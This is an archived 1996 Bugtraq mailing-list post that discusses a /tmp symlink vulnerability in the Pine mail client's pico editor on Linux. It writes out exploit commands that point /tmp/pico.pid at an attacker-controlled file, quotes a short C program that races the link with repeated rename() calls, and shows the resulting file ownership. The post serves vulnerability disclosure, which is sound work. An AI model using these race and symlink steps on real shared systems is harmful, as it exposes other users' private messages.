OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
Bugtraq archives for 3rd quarter (Jul-Sep) 1996: Re: message rejected: Re: [linux-security] Pine security problem.

Re: message rejected: Re: [linux-security] Pine security problem.

Pascal A. Dupuis (dupuislei.ucl.ac.be)
Fri, 13 Sep 1996 10:07:19 +0200

Hello,
I got a bunch of messages in reply to Re: Pine Security problem. Here is a
summary:
First of all, the exploit is straightforward with Linux :
ln -s /tmp/hacker.tmp /tmp/pico.pid; touch /tmp/hacker.tmp;
the /tmp/hacker.tmp must be rw-rw-rw- (mode 666), and everybody could
have a look on composed message.
I tried also Rogier Wolff suggestion about the flipperlink program ,
running at high processor load to have swapping (compiling the kernel)
>main (int argc,char **argv)
> {
>       while (1) {
>       rename (argv[1],argv[2]);
>       rename (argv[2],argv[1]);
>       }
> }
and run it with :
>       cd /tmp
>       ln -s hacker.tmp pico.pid
>       flipperlink pico.pid bla

Once the alternate editor is invoqued,  the hacker.tmp, if not
existing, is created 600, owned by the pine user. At this time, the toggle
stop working as long as the alternate editor is working.
the amasing fact is the ownership :
ls -l /tmp
lrwxrwxrwx   1 hacker   grp    10 Sep 13 09:49 bla ->hacker.tmp
-rw-------   1 dupuis   grp  3042 Sep 13 09:50 hacker.tmp
hacker> more blah
hacker>blah : permission denied
It is thus the ownership of the destination file which is used.
Greetings
Pascal A. Dupuis

--
Information Science is emerging from the Prehistoric Ages, but its
language still reflects it : gnu, hurd, awk, nroff, ls, ar, chmod, ...